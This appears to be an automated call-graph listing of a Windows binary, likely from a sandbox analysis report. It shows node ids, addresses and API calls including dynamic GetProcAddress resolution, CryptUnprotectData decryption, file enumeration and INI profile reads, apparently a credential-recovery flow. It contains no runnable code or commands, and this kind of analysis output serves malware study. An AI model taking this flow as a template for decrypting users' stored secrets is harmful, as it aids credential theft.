RegEnumValueW 39093->39094 39094->38962 39094->38963 39096 405335 39095->39096 39097 40522a 39095->39097 39096->38545 39098 40b2cc 27 API calls 39097->39098 39099 405234 39098->39099 39100 40a804 8 API calls 39099->39100 39101 40523a 39100->39101 39140 40b273 39101->39140 39103 405248 _mbscpy _mbscat GetProcAddress 39104 40b273 27 API calls 39103->39104 39105 405279 39104->39105 39143 405211 GetProcAddress 39105->39143 39107 405282 39108 40b273 27 API calls 39107->39108 39109 40528f 39108->39109 39144 405211 GetProcAddress 39109->39144 39111 405298 39112 40b273 27 API calls 39111->39112 39113 4052a5 39112->39113 39145 405211 GetProcAddress 39113->39145 39115 4052ae 39116 40b273 27 API calls 39115->39116 39117 4052bb 39116->39117 39146 405211 GetProcAddress 39117->39146 39119 4052c4 39120 40b273 27 API calls 39119->39120 39121 4052d1 39120->39121 39147 405211 GetProcAddress 39121->39147 39123 4052da 39124 40b273 27 API calls 39123->39124 39125 4052e7 39124->39125 39148 405211 GetProcAddress 39125->39148 39127 4052f0 39128 40b273 27 API calls 39127->39128 39129 4052fd 39128->39129 39149 405211 GetProcAddress 39129->39149 39131 405306 39132 40b273 27 API calls 39131->39132 39133 405313 39132->39133 39150 405211 GetProcAddress 39133->39150 39135 40531c 39136 40b273 27 API calls 39135->39136 39137 405329 39136->39137 39151 405211 GetProcAddress 39137->39151 39139 405332 39139->39096 39141 40b58d 27 API calls 39140->39141 39142 40b18c 39141->39142 39142->39103 39143->39107 39144->39111 39145->39115 39146->39119 39147->39123 39148->39127 39149->39131 39150->39135 39151->39139 39153 405220 39 API calls 39152->39153 39154 405369 39153->39154 39154->38980 39154->38981 39155->38984 39156->38987 39157->38983 39158->38981 39160 40440c FreeLibrary 39159->39160 39161 40436d 39160->39161 39162 40a804 8 API calls 39161->39162 39163 404377 39162->39163 39164 404383 39163->39164 39165 404405 39163->39165 39166 40b273 27 API calls 39164->39166 39165->38554 39165->38556 39165->38557 39167 40438d GetProcAddress 39166->39167 39168 40b273 27 API calls 39167->39168 39169 4043a7 GetProcAddress 39168->39169 39170 40b273 27 API calls 39169->39170 39171 4043ba GetProcAddress 39170->39171 39172 40b273 27 API calls 39171->39172 39173 4043ce GetProcAddress 39172->39173 39174 40b273 27 API calls 39173->39174 39175 4043e2 GetProcAddress 39174->39175 39176 4043f1 39175->39176 39177 4043f7 39176->39177 39178 40440c FreeLibrary 39176->39178 39177->39165 39178->39165 39180 404413 FreeLibrary 39179->39180 39181 40441e 39179->39181 39180->39181 39181->38571 39182->38563 39184 40447e 39183->39184 39185 40442e 39183->39185 39186 404485 CryptUnprotectData 39184->39186 39187 40449c 39184->39187 39188 40b2cc 27 API calls 39185->39188 39186->39187 39187->38563 39189 404438 39188->39189 39190 40a804 8 API calls 39189->39190 39191 40443e 39190->39191 39192 404445 39191->39192 39193 404467 39191->39193 39194 40b273 27 API calls 39192->39194 39193->39184 39195 404475 FreeLibrary 39193->39195 39196 40444f GetProcAddress 39194->39196 39195->39184 39196->39193 39197 404460 39196->39197 39197->39193 39199 4135f6 39198->39199 39200 4135eb FreeLibrary 39198->39200 39199->38574 39200->39199 39202 4449c4 39201->39202 39203 444a52 39201->39203 39204 40b2cc 27 API calls 39202->39204 39203->38591 39203->38592 39205 4449cb 39204->39205 39206 40a804 8 API calls 39205->39206 39207 4449d1 39206->39207 39208 40b273 27 API calls 39207->39208 39209 4449dc GetProcAddress 39208->39209 39210 40b273 27 API calls 39209->39210 39211 4449f3 GetProcAddress 39210->39211 39212 40b273 27 API calls 39211->39212 39213 444a04 GetProcAddress 39212->39213 39214 40b273 27 API calls 39213->39214 39215 444a15 GetProcAddress 39214->39215 39216 40b273 27 API calls 39215->39216 39217 444a26 GetProcAddress 39216->39217 39218 40b273 27 API calls 39217->39218 39219 444a37 GetProcAddress 39218->39219 39220 40b273 27 API calls 39219->39220 39221 444a48 GetProcAddress 39220->39221 39221->39203 39222->38602 39223->38602 39224->38602 39225->38602 39226->38593 39228 403a29 39227->39228 39242 403bed memset memset 39228->39242 39230 403ae7 39255 40b1ab ??3@YAXPAX ??3@YAXPAX 39230->39255 39231 403a3f memset 39236 403a2f 39231->39236 39233 403aef 39233->38609 39234 40a8d0 7 API calls 39234->39236 39235 409d1f 6 API calls 39235->39236 39236->39230 39236->39231 39236->39234 39236->39235 39237 409b98 GetFileAttributesW 39236->39237 39237->39236 39239 40a051 GetFileTime FindCloseChangeNotification 39238->39239 39240 4039ca CompareFileTime 39238->39240 39239->39240 39240->38609 39241->38610 39243 414c2e 16 API calls 39242->39243 39244 403c38 39243->39244 39245 409719 2 API calls 39244->39245 39246 403c3f wcscat 39245->39246 39247 414c2e 16 API calls 39246->39247 39248 403c61 39247->39248 39249 409719 2 API calls 39248->39249 39250 403c68 wcscat 39249->39250 39256 403af5 39250->39256 39253 403af5 20 API calls 39254 403c95 39253->39254 39254->39236 39255->39233 39257 403b02 39256->39257 39258 40ae18 9 API calls 39257->39258 39266 403b37 39258->39266 39259 403bdb 39261 40aebe FindClose 39259->39261 39260 40add4 wcscmp wcscmp 39260->39266 39262 403be6 39261->39262 39262->39253 39263 40ae18 9 API calls 39263->39266 39264 40ae51 9 API calls 39264->39266 39265 40aebe FindClose 39265->39266 39266->39259 39266->39260 39266->39263 39266->39264 39266->39265 39267 40a8d0 7 API calls 39266->39267 39267->39266 39269 409d1f 6 API calls 39268->39269 39270 404190 39269->39270 39283 409b98 GetFileAttributesW 39270->39283 39272 40419c 39273 4041a7 6 API calls 39272->39273 39274 40435c 39272->39274 39276 40424f 39273->39276 39274->38636 39276->39274 39277 40425e memset 39276->39277 39279 409d1f 6 API calls 39276->39279 39280 40a8ab 9 API calls 39276->39280 39284 414842 39276->39284 39277->39276 39278 404296 wcscpy 39277->39278 39278->39276 39279->39276 39281 4042b6 memset memset _snwprintf wcscpy 39280->39281 39281->39276 39282->38634 39283->39272 39287 41443e 39284->39287 39286 414866 39286->39276 39288 41444b 39287->39288 39289 414451 39288->39289 39290 4144a3 GetPrivateProfileStringW 39288->39290 39291 414491 39289->39291 39292 414455 wcschr 39289->39292 39290->39286 39294 414495 WritePrivateProfileStringW 39291->39294 39292->39291 39293 414463 _snwprintf 39292->39293 39293->39294 39294->39286 39295->38640 39297 40b2cc 27 API calls 39296->39297 39298 409615 39297->39298 39299 409d1f 6 API calls 39298->39299 39300 409625 39299->39300 39325 409b98 GetFileAttributesW 39300->39325 39302 409634 39303 409648 39302->39303 39326 4091b8 memset 39302->39326 39305 40b2cc 27 API calls 39303->39305 39307 408801 39303->39307 39306 40965d 39305->39306 39308 409d1f 6 API calls 39306->39308 39307->38643 39307->38644 39309 40966d 39308->39309 39378 409b98 GetFileAttributesW 39309->39378 39311 40967c 39311->39307 39312 409681 39311->39312 39379 409529 72 API calls 39312->39379 39314 409690 39314->39307 39315->38666 39316->38643 39317->38671 39318->38643 39319->38676 39325->39302 39380 40a6e6 WideCharToMultiByte 39326->39380 39328 409202 39381 444432 39328->39381 39331 40b273 27 API calls 39332 409236 39331->39332 39427 438552 39332->39427 39335 409383 39337 40b273 27 API calls 39335->39337 39339 409399 39337->39339 39338 409254 39340 40937b 39338->39340 39448 4253cf 17 API calls 39338->39448 39341 438552 134 API calls 39339->39341 39452 424f26 123 API calls 39340->39452 39359 4093a3 39341->39359 39344 409267 39449 4253cf 17 API calls 39344->39449 39345 4094ff 39456 443d90 39345->39456 39348 4251c4 137 API calls 39348->39359 39350 409507 39358 40951d 39350->39358 39476 408f2f 77 API calls 39350->39476 39352 4093df 39455 424f26 123 API calls 39352->39455 39356 4253cf 17 API calls 39356->39359 39358->39303 39359->39345 39359->39348 39359->39352 39359->39356 39361 4093e4 39359->39361 39453 4253af 17 API calls 39361->39453 39368 4093ed 39454 4253af 17 API calls 39368->39454 39371 4093f9 39371->39352 39372 409409 memcmp 39371->39372 39372->39352 39373 409421 memcmp 39372->39373 39374 4094a4 memcmp 39373->39374 39375 409435 39373->39375 39374->39352 39375->39352 39378->39311 39379->39314 39380->39328 39477 4438b5 39381->39477 39383 44444c 39389 409215 39383->39389 39491 415a6d 39383->39491 39385 444486 39388 4444b9 memcpy 39385->39388 39426 4444a4 39385->39426 39386 4442e6 11 API calls 39387 44469e 39386->39387 39387->39389 39391 443d90 111 API calls 39387->39391 39495 415258 39388->39495 39389->39331 39389->39358 39391->39389 39392 444524 39393 444541 39392->39393 39394 44452a 39392->39394 39498 444316 39393->39498 39395 416935 16 API calls 39394->39395 39395->39426 39398 444316 18 API calls 39399 444563 39398->39399 39400 444316 18 API calls 39399->39400 39401 44456f 39400->39401 39402 444316 18 API calls 39401->39402 39403 44457f 39402->39403 39403->39426 39512 432d4e 39403->39512 39406 444316 18 API calls 39426->39386 39565 438460 39427->39565 39429 409240 39429->39335 39430 4251c4 39429->39430 39577 424f07 39430->39577 39432 4251e4 39433 4251f7 39432->39433 39434 4251e8 39432->39434 39585 4250f8 39433->39585 39584 4446ea 11 API calls 39434->39584 39436 4251f2 39436->39338 39438 425209 39441 425249 39438->39441 39444 4250f8 127 API calls 39438->39444 39445 425287 39438->39445 39593 4384e9 135 API calls 39438->39593 39594 424f74 124 API calls 39438->39594 39441->39445 39595 424ff0 13 API calls 39441->39595 39444->39438 39597 415c7d 39445->39597 39448->39344 39452->39335 39453->39368 39454->39371 39455->39345 39457 443da3 39456->39457 39458 443db6 39456->39458 39601 41707a 11 API calls 39457->39601 39458->39350 39460 443da8 39461 443dbc 39460->39461 39462 443dac 39460->39462 39603 4300e8 memset memset memcpy 39461->39603 39602 4446ea 11 API calls 39462->39602 39465 443dce 39476->39358 39478 4438d0 39477->39478 39489 4438c9 39477->39489 39479 415378 memcpy memcpy 39478->39479 39480 4438d5 39479->39480 39481 4154e2 10 API calls 39480->39481 39482 443906 39480->39482 39480->39489 39481->39482 39483 443970 memset 39482->39483 39482->39489 39485 44398b 39483->39485 39484 4439a0 39486 415700 10 API calls 39484->39486 39484->39489 39485->39484 39488 41975c 10 API calls 39485->39488 39487 4439c0 39486->39487 39487->39489 39490 418981 10 API calls 39487->39490 39488->39484 39489->39383 39490->39489 39492 415a77 39491->39492 39493 415a8d 39492->39493 39494 415a7e memset 39492->39494 39493->39385 39494->39493 39496 4438b5 11 API calls 39495->39496 39497 41525d 39496->39497 39497->39392 39499 444328 39498->39499 39500 444423 39499->39500 39501 44434e 39499->39501 39502 4446ea 11 API calls 39500->39502 39503 432d4e memset memset memcpy 39501->39503 39509 444381 39502->39509 39504 44435a 39503->39504 39506 444375 39504->39506 39511 44438b 39504->39511 39505 432d4e memset memset memcpy 39507 4443ec 39505->39507 39508 416935 16 API calls 39506->39508 39507->39509 39510 416935 16 API calls 39507->39510 39508->39509 39509->39398 39510->39509 39511->39505 39513 432d65 39512->39513 39514 432d58 39512->39514 39513->39406 39515 432cc4 memset memset memcpy 39514->39515 39515->39513 39566 41703f 11 API calls 39565->39566 39567 43847a 39566->39567 39568 43848a 39567->39568 39569 43847e 39567->39569 39571 438270 134 API calls 39568->39571 39570 4446ea 11 API calls 39569->39570 39573 438488 39570->39573 39572 4384aa 39571->39572 39572->39573 39574 424f26 123 API calls 39572->39574 39573->39429 39575 4384bb 39574->39575 39576 438270 134 API calls 39575->39576 39576->39573 39578 424f1f 39577->39578 39579 424f0c 39577->39579 39581 424eea 11 API calls 39578->39581 39580 416760 11 API calls 39579->39580 39582 424f18 39580->39582 39583 424f24 39581->39583 39582->39432 39583->39432 39584->39436 39586 425108 39585->39586 39592 42510d 39585->39592 39587 424f74 124 API calls 39586->39587 39587->39592 39588 42569b 125 API calls 39589 42516e 39588->39589 39591 415c7d 16 API calls 39589->39591 39590 425115 39590->39438 39591->39590 39592->39588 39592->39590 39593->39438 39594->39438 39601->39460 39602->39458 39603->39465 39634 413f4f 39607->39634 39610 413f37 K32GetModuleFileNameExW 39611 413f4a 39610->39611 39611->38702 39613 413969 wcscpy 39612->39613 39614 41396c wcschr 39612->39614 39626 413a3a 39613->39626 39614->39613 39616 41398e 39614->39616 39639 4097f7 wcslen wcslen _memicmp 39616->39639 39618 41399a 39619 4139a4 memset 39618->39619 39620 4139e6 39618->39620 39640 409dd5 GetWindowsDirectoryW wcscpy 39619->39640 39622 413a31 wcscpy 39620->39622 39623 4139ec memset 39620->39623 39622->39626 39641 409dd5 GetWindowsDirectoryW wcscpy 39623->39641 39624 4139c9 wcscpy wcscat 39624->39626 39626->38702 39627 413a11 memcpy wcscat 39627->39626 39629 413cb0 GetModuleHandleW 39628->39629 39630 413cda 39628->39630 39629->39630 39631 413cbf GetProcAddress 39629->39631 39632 413ce3 GetProcessTimes 39630->39632 39633 413cf6 39630->39633 39631->39630 39632->38705 39633->38705 39635 413f2f 39634->39635 39636 413f54 39634->39636 39635->39610 39635->39611 39637 40a804 8 API calls 39636->39637 39638 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 39637->39638 39638->39635 39639->39618 39640->39624 39641->39627 39642->38726 39643->38749 39645 409cf9 GetVersionExW 39644->39645 39646 409d0a 39644->39646 39645->39646 39646->38755 39646->38760 39647->38761 39648->38764 39649->38766 39650->38831 39652 40bba5 39651->39652 39699 40cc26 39652->39699 39655 40bd4b 39720 40cc0c 39655->39720 39660 40b2cc 27 API calls 39661 40bbef 39660->39661 39727 40ccf0 _wcsicmp 39661->39727 39663 40bbf5 39663->39655 39728 40ccb4 6 API calls 39663->39728 39665 40bc26 39666 40cf04 17 API calls 39665->39666 39667 40bc2e 39666->39667 39668 40bd43 39667->39668 39669 40b2cc 27 API calls 39667->39669 39670 40cc0c 4 API calls 39668->39670 39671 40bc40 39669->39671 39670->39655 39729 40ccf0 _wcsicmp 39671->39729 39673 40bc46 39673->39668 39674 40bc61 memset memset WideCharToMultiByte 39673->39674 39730 40103c strlen 39674->39730 39676 40bcc0 39677 40b273 27 API calls 39676->39677 39678 40bcd0 memcmp 39677->39678 39678->39668 39679 40bce2 39678->39679 39680 404423 38 API calls 39679->39680 39681 40bd10 39680->39681 39681->39668 39682 40bd3a LocalFree 39681->39682 39683 40bd1f memcpy 39681->39683 39682->39668 39683->39682 39684->38846 39686 409a74 GetTempFileNameW 39685->39686 39687 409a66 GetWindowsDirectoryW 39685->39687 39686->38844 39687->39686 39688->38882 39689->38882 39690->38882 39691->38882 39692->38882 39693->38882 39694->38882 39695->38882 39696->38882 39697->38858 39698->38879 39731 4096c3 CreateFileW 39699->39731 39701 40cc34 39702 40cc3d GetFileSize 39701->39702 39710 40bbca 39701->39710 39703 40afcf 2 API calls 39702->39703 39704 40cc64 39703->39704 39732 40a2ef ReadFile 39704->39732 39706 40cc71 39733 40ab4a MultiByteToWideChar 39706->39733 39708 40cc95 FindCloseChangeNotification 39709 40b04b ??3@YAXPAX 39708->39709 39709->39710 39710->39655 39711 40cf04 39710->39711 39712 40b633 ??3@YAXPAX 39711->39712 39713 40cf14 39712->39713 39739 40b1ab ??3@YAXPAX ??3@YAXPAX 39713->39739 39715 40bbdd 39715->39655 39715->39660 39716 40cf1b 39716->39715 39718 40cfef 39716->39718 39740 40cd4b 39716->39740 39719 40cd4b 14 API calls 39718->39719 39719->39715 39721 40b633 ??3@YAXPAX 39720->39721 39722 40cc15 39721->39722 39723 40aa04 ??3@YAXPAX 39722->39723 39724 40cc1d 39723->39724 39789 40b1ab ??3@YAXPAX ??3@YAXPAX 39724->39789 39726 40b7d4 memset CreateFileW 39726->38838 39726->38839 39727->39663 39728->39665 39729->39673 39730->39676 39731->39701 39732->39706 39734 40ab93 39733->39734 39735 40ab6b 39733->39735 39734->39708 39736 40a9ce 4 API calls 39735->39736 39737 40ab74 39736->39737 39738 40ab7c MultiByteToWideChar 39737->39738 39738->39734 39739->39716 39741 40cd7b 39740->39741 39774 40aa29 39741->39774 39743 40cef5 39744 40aa04 ??3@YAXPAX 39743->39744 39745 40cefd 39744->39745 39745->39716 39747 40aa29 6 API calls 39748 40ce1d 39747->39748 39749 40aa29 6 API calls 39748->39749 39750 40ce3e 39749->39750 39751 40ce6a 39750->39751 39782 40abb7 wcslen memmove 39750->39782 39752 40ce9f 39751->39752 39785 40abb7 wcslen memmove 39751->39785 39754 40a8d0 7 API calls 39752->39754 39757 40ceb5 39754->39757 39755 40ce56 39783 40aa71 wcslen 39755->39783 39763 40a8d0 7 API calls 39757->39763 39759 40ce8b 39786 40aa71 wcslen 39759->39786 39760 40ce5e 39784 40abb7 wcslen memmove 39760->39784 39766 40cecb 39763->39766 39764 40ce93 39787 40abb7 wcslen memmove 39764->39787 39788 40d00b malloc memcpy ??3@YAXPAX ??3@YAXPAX 39766->39788 39768 40cedd 39769 40aa04 ??3@YAXPAX 39768->39769 39770 40cee5 39769->39770 39771 40aa04 ??3@YAXPAX 39770->39771 39772 40ceed 39771->39772 39773 40aa04 ??3@YAXPAX 39772->39773 39773->39743 39775 40aa33 39774->39775 39776 40aa63 39774->39776 39777 40aa44 39775->39777 39778 40aa38 wcslen 39775->39778 39776->39743 39776->39747 39779 40a9ce malloc memcpy ??3@YAXPAX ??3@YAXPAX 39777->39779 39778->39777 39780 40aa4d 39779->39780 39780->39776 39781 40aa51 memcpy 39780->39781 39781->39776 39782->39755 39783->39760 39784->39751 39785->39759 39786->39764 39787->39752 39788->39768 39789->39726 39790->38898 39791->38906 37667 44dea5 37668 44deb5 FreeLibrary 37667->37668 37669 44dec3 37667->37669 37668->37669 39801 4148b6 FindResourceW 39802 4148cf SizeofResource 39801->39802 39805 4148f9 39801->39805 39803 4148e0 LoadResource 39802->39803 39802->39805 39804 4148ee LockResource 39803->39804 39803->39805 39804->39805 37846 415304 ??3@YAXPAX 39806 441b3f 39816 43a9f6 39806->39816 39808 441b61 39989 4386af memset 39808->39989 39810 44189a 39811 4418e2 39810->39811 39815 442bd4 39810->39815 39812 4418ea 39811->39812 39990 4414a9 12 API calls 39811->39990 39815->39812 39991 441409 memset 39815->39991 39817 43aa20 39816->39817 39818 43aadf 39816->39818 39817->39818 39819 43aa34 memset 39817->39819 39818->39808 39820 43aa56 39819->39820 39821 43aa4d 39819->39821 39992 43a6e7 39820->39992 40000 42c02e memset 39821->40000 39826 43aad3 40002 4169a7 11 API calls 39826->40002 39827 43aaae 39827->39818 39827->39826 39842 43aae5 39827->39842 39828 43ac18 39831 43ac47 39828->39831 40004 42bbd5 memcpy memcpy memcpy memset memcpy 39828->40004 39832 43aca8 39831->39832 40005 438eed 16 API calls 39831->40005 39835 43acd5 39832->39835 40007 4233ae 11 API calls 39832->40007 40008 423426 11 API calls 39835->40008 39836 43ac87 40006 4233c5 16 API calls 39836->40006 39840 43ace1 40009 439811 163 API calls 39840->40009 39841 43a9f6 161 API calls 39841->39842 39842->39818 39842->39828 39842->39841 40003 439bbb 22 API calls 39842->40003 39844 43acfd 39850 43ad2c 39844->39850 40010 438eed 16 API calls 39844->40010 39846 43ad19 40011 4233c5 16 API calls 39846->40011 39847 43ad58 40012 44081d 163 API calls 39847->40012 39850->39847 39853 43add9 39850->39853 39852 43ae3a memset 39854 43ae73 39852->39854 39853->39853 40016 423426 11 API calls 39853->40016 40017 42e1c0 147 API calls 39854->40017 39855 43adab 40014 438c4e 163 API calls 39855->40014 39858 43ad6c 39858->39818 39858->39855 40013 42370b memset memcpy memset 39858->40013 39859 43adcc 40015 440f84 12 API calls 39859->40015 39860 43ae96 40018 42e1c0 147 API calls 39860->40018 39864 43aea8 39865 43aec1 39864->39865 40019 42e199 147 API calls 39864->40019 39866 43af00 39865->39866 40020 42e1c0 147 API calls 39865->40020 39866->39818 39870 43af1a 39866->39870 39871 43b3d9 39866->39871 40021 438eed 16 API calls 39870->40021 39876 43b3f6 39871->39876 39880 43b4c8 39871->39880 39873 43b60f 39873->39818 40080 4393a5 17 API calls 39873->40080 39874 43af2f 40022 4233c5 16 API calls 39874->40022 40062 432878 12 API calls 39876->40062 39878 43af51 40023 423426 11 API calls 39878->40023 39886 43b4f2 39880->39886 40068 42bbd5 memcpy memcpy memcpy memset memcpy 39880->40068 39882 43af7d 40024 423426 11 API calls 39882->40024 40069 43a76c 21 API calls 39886->40069 39887 43b529 40070 44081d 163 API calls 39887->40070 39888 43b462 40064 423330 11 API calls 39888->40064 39889 43af94 40025 423330 11 API calls 39889->40025 39893 43b47e 39898 43b497 39893->39898 40065 42374a memcpy memset memcpy memcpy memcpy 39893->40065 39894 43b544 39899 43b55c 39894->39899 40071 42c02e memset 39894->40071 39895 43b428 39895->39888 40063 432b60 16 API calls 39895->40063 39896 43afca 40026 423330 11 API calls 39896->40026 40066 4233ae 11 API calls 39898->40066 40072 43a87a 163 API calls 39899->40072 39900 43afdb 40027 4233ae 11 API calls 39900->40027 39906 43b56c 39909 43b58a 39906->39909 40073 423330 11 API calls 39906->40073 39907 43b4b1 40067 423399 11 API calls 39907->40067 39908 43afee 40028 44081d 163 API calls 39908->40028 40074 440f84 12 API calls 39909->40074 39914 43b4c1 40076 42db80 163 API calls 39914->40076 39916 43b592 40075 43a82f 16 API calls 39916->40075 39919 43b5b4 40077 438c4e 163 API calls 39919->40077 39921 43b5cf 40078 42c02e memset 39921->40078 39923 43b005 39923->39818 39927 43b01f 39923->39927 40029 42d836 163 API calls 39923->40029 39924 43b1ef 40039 4233c5 16 API calls 39924->40039 39927->39924 40037 423330 11 API calls 39927->40037 40038 42d71d 163 API calls 39927->40038 39928 43b212 40040 423330 11 API calls 39928->40040 39929 43b087 40030 4233ae 11 API calls 39929->40030 39930 43add4 39930->39873 40079 438f86 16 API calls 39930->40079 39935 43b22a 40041 42ccb5 11 API calls 39935->40041 39937 43b23f 40042 4233ae 11 API calls 39937->40042 39938 43b10f 40033 423330 11 API calls 39938->40033 39940 43b257 40043 4233ae 11 API calls 39940->40043 39944 43b129 40034 4233ae 11 API calls 39944->40034 39945 43b26e 40044 4233ae 11 API calls 39945->40044 39948 43b09a 39948->39938 40031 42cc15 19 API calls 39948->40031 40032 4233ae 11 API calls 39948->40032 39949 43b282 40045 43a87a 163 API calls 39949->40045 39951 43b13c 40035 440f84 12 API calls 39951->40035 39953 43b29d 40046 423330 11 API calls 39953->40046 39956 43b15f 40036 4233ae 11 API calls 39956->40036 39957 43b2af 39959 43b2b8 39957->39959 39960 43b2ce 39957->39960 40047 4233ae 11 API calls 39959->40047 40048 440f84 12 API calls 39960->40048 39963 43b2c9 40050 4233ae 11 API calls 39963->40050 39964 43b2da 40049 42370b memset memcpy memset 39964->40049 39967 43b2f9 40051 423330 11 API calls 39967->40051 39969 43b30b 40052 423330 11 API calls 39969->40052 39971 43b325 40053 423399 11 API calls 39971->40053 39973 43b332 40054 4233ae 11 API calls 39973->40054 39975 43b354 40055 423399 11 API calls 39975->40055 39977 43b364 40056 43a82f 16 API calls 39977->40056 39979 43b370 40057 42db80 163 API calls 39979->40057 39981 43b380 40058 438c4e 163 API calls 39981->40058 39983 43b39e 40059 423399 11 API calls 39983->40059 39985 43b3ae 40060 43a76c 21 API calls 39985->40060 39987 43b3c3 40061 423399 11 API calls 39987->40061 39989->39810 39990->39812 39991->39815 39993 43a6f5 39992->39993 39994 43a765 39992->39994 39993->39994 40081 42a115 39993->40081 39994->39818 40001 4397fd memset 39994->40001 39998 43a73d 39998->39994 39999 42a115 147 API calls 39998->39999 39999->39994 40000->39820 40001->39827 40002->39818 40003->39842 40004->39831 40005->39836 40006->39832 40007->39835 40008->39840 40009->39844 40010->39846 40011->39850 40012->39858 40013->39855 40014->39859 40015->39930 40016->39852 40017->39860 40018->39864 40019->39865 40020->39865 40021->39874 40022->39878 40023->39882 40024->39889 40025->39896 40026->39900 40027->39908 40028->39923 40029->39929 40030->39948 40031->39948 40032->39948 40033->39944 40034->39951 40035->39956 40036->39927 40037->39927 40038->39927 40039->39928 40040->39935 40041->39937 40042->39940 40043->39945 40044->39949 40045->39953 40046->39957 40047->39963 40048->39964 40049->39963 40050->39967 40051->39969 40052->39971 40053->39973 40054->39975 40055->39977 40056->39979 40057->39981 40058->39983 40059->39985 40060->39987 40061->39930 40062->39895 40063->39888 40064->39893 40065->39898 40066->39907 40067->39914 40068->39886 40069->39887 40070->39894 40071->39899 40072->39906 40073->39909 40074->39916 40075->39914 40076->39919 40077->39921 40078->39930 40079->39873 40080->39818 40082 42a175 40081->40082 40084 42a122 40081->40084 40082->39994 40087 42b13b 147 API calls 40082->40087 40084->40082 40085 42a115 147 API calls 40084->40085 40088 43a174 40084->40088 40112 42a0a8 147 API calls 40084->40112 40085->40084 40087->39998 40102 43a196 40088->40102 40103 43a19e 40088->40103 40089 43a306 40089->40102 40132 4388c4 14 API calls 40089->40132 40092 42a115 147 API calls 40092->40103 40094 43a642 40094->40102 40136 4169a7 11 API calls 40094->40136 40098 43a635 40135 42c02e memset 40098->40135 40102->40084 40103->40089 40103->40092 40103->40102 40113 42ff8c 40103->40113 40121 415a91 40103->40121 40125 4165ff 40103->40125 40128 439504 13 API calls 40103->40128 40129 4312d0 147 API calls 40103->40129 40130 42be4c memcpy memcpy memcpy memset memcpy 40103->40130 40131 43a121 11 API calls 40103->40131 40105 4169a7 11 API calls 40106 43a325 40105->40106 40106->40094 40106->40098 40106->40102 40106->40105 40107 42b5b5 memset memcpy 40106->40107 40108 42bf4c 14 API calls 40106->40108 40111 4165ff 11 API calls 40106->40111 40133 42b63e 14 API calls 40106->40133 40134 42bfcf memcpy 40106->40134 40107->40106 40108->40106 40111->40106 40112->40084 40137 43817e 40113->40137 40115 42ff99 40116 42ffe3 40115->40116 40117 42ffd0 40115->40117 40120 42ff9d 40115->40120 40142 4169a7 11 API calls 40116->40142 40141 4169a7 11 API calls 40117->40141 40120->40103 40122 415a9d 40121->40122 40123 415ab3 40122->40123 40124 415aa4 memset 40122->40124 40123->40103 40124->40123 40291 4165a0 40125->40291 40128->40103 40129->40103 40130->40103 40131->40103 40132->40106 40133->40106 40134->40106 40135->40094 40136->40102 40138 438187 40137->40138 40140 438192 40137->40140 40143 4380f6 40138->40143 40140->40115 40141->40120 40142->40120 40145 43811f 40143->40145 40144 438164 40144->40140 40145->40144 40148 437e5e 40145->40148 40171 4300e8 memset memset memcpy 40145->40171 40172 437d3c 40148->40172 40150 437eb3 40150->40145 40151 437ea9 40151->40150 40156 437f22 40151->40156 40187 41f432 40151->40187 40154 437f06 40234 415c56 11 API calls 40154->40234 40158 432d4e 3 API calls 40156->40158 40159 437f7f 40156->40159 40157 437f95 40235 415c56 11 API calls 40157->40235 40158->40159 40159->40157 40160 43802b 40159->40160 40162 4165ff 11 API calls 40160->40162 40163 438054 40162->40163 40198 437371 40163->40198 40166 43806b 40167 438094 40166->40167 40236 42f50e 138 API calls 40166->40236 40169 437fa3 40167->40169 40237 4300e8 memset memset memcpy 40167->40237 40169->40150 40238 41f638 104 API calls 40169->40238 40171->40145 40173 437d69 40172->40173 40176 437d80 40172->40176 40239 437ccb 11 API calls 40173->40239 40175 437d76 40175->40151 40176->40175 40177 437da3 40176->40177 40179 437d90 40176->40179 40180 438460 134 API calls 40177->40180 40179->40175 40243 437ccb 11 API calls 40179->40243 40183 437dcb 40180->40183 40181 437de8 40242 424f26 123 API calls 40181->40242 40183->40181 40240 444283 13 API calls 40183->40240 40185 437dfc 40241 437ccb 11 API calls 40185->40241 40188 41f54d 40187->40188 40194 41f44f 40187->40194 40189 41f466 40188->40189 40273 41c635 memset memset 40188->40273 40189->40154 40189->40156 40194->40189 40196 41f50b 40194->40196 40244 41f1a5 40194->40244 40269 41c06f memcmp 40194->40269 40270 41f3b1 90 API calls 40194->40270 40271 41f398 86 API calls 40194->40271 40196->40188 40196->40189 40272 41c295 86 API calls 40196->40272 40274 41703f 40198->40274 40200 437399 40201 43739d 40200->40201 40203 4373ac 40200->40203 40281 4446ea 11 API calls 40201->40281 40204 416935 16 API calls 40203->40204 40205 4373ca 40204->40205 40206 438460 134 API calls 40205->40206 40211 4251c4 137 API calls 40205->40211 40215 415a91 memset 40205->40215 40218 43758f 40205->40218 40230 437584 40205->40230 40233 437d3c 135 API calls 40205->40233 40282 425433 13 API calls 40205->40282 40283 425413 17 API calls 40205->40283 40284 42533e 16 API calls 40205->40284 40285 42538f 16 API calls 40205->40285 40286 42453e 123 API calls 40205->40286 40206->40205 40207 4375bc 40209 415c7d 16 API calls 40207->40209 40210 4375d2 40209->40210 40212 4442e6 11 API calls 40210->40212 40232 4373a7 40210->40232 40211->40205 40213 4375e2 40212->40213 40213->40232 40289 444283 13 API calls 40213->40289 40215->40205 40287 42453e 123 API calls 40218->40287 40221 4375f4 40224 437620 40221->40224 40225 43760b 40221->40225 40223 43759f 40226 416935 16 API calls 40223->40226 40228 416935 16 API calls 40224->40228 40290 444283 13 API calls 40225->40290 40226->40230 40228->40232 40230->40207 40288 42453e 123 API calls 40230->40288 40231 437612 memcpy 40231->40232 40232->40166 40233->40205 40234->40150 40235->40169 40236->40167 40237->40169 40238->40150 40239->40175 40240->40185 40241->40181 40242->40175 40243->40175 40245 41bc3b 101 API calls 40244->40245 40246 41f1b4 40245->40246 40247 41edad 86 API calls 40246->40247 40254 41f282 40246->40254 40248 41f1cb 40247->40248 40249 41f1f5 memcmp 40248->40249 40250 41f20e 40248->40250 40248->40254 40249->40250 40251 41f21b memcmp 40250->40251 40250->40254 40252 41f326 40251->40252 40255 41f23d 40251->40255 40253 41ee6b 86 API calls 40252->40253 40252->40254 40253->40254 40254->40194 40255->40252 40256 41f28e memcmp 40255->40256 40258 41c8df 56 API calls 40255->40258 40256->40252 40257 41f2a9 40256->40257 40257->40252 40260 41f308 40257->40260 40261 41f2d8 40257->40261 40259 41f269 40258->40259 40259->40252 40262 41f287 40259->40262 40263 41f27a 40259->40263 40260->40252 40267 4446ce 11 API calls 40260->40267 40264 41ee6b 86 API calls 40261->40264 40262->40256 40265 41ee6b 86 API calls 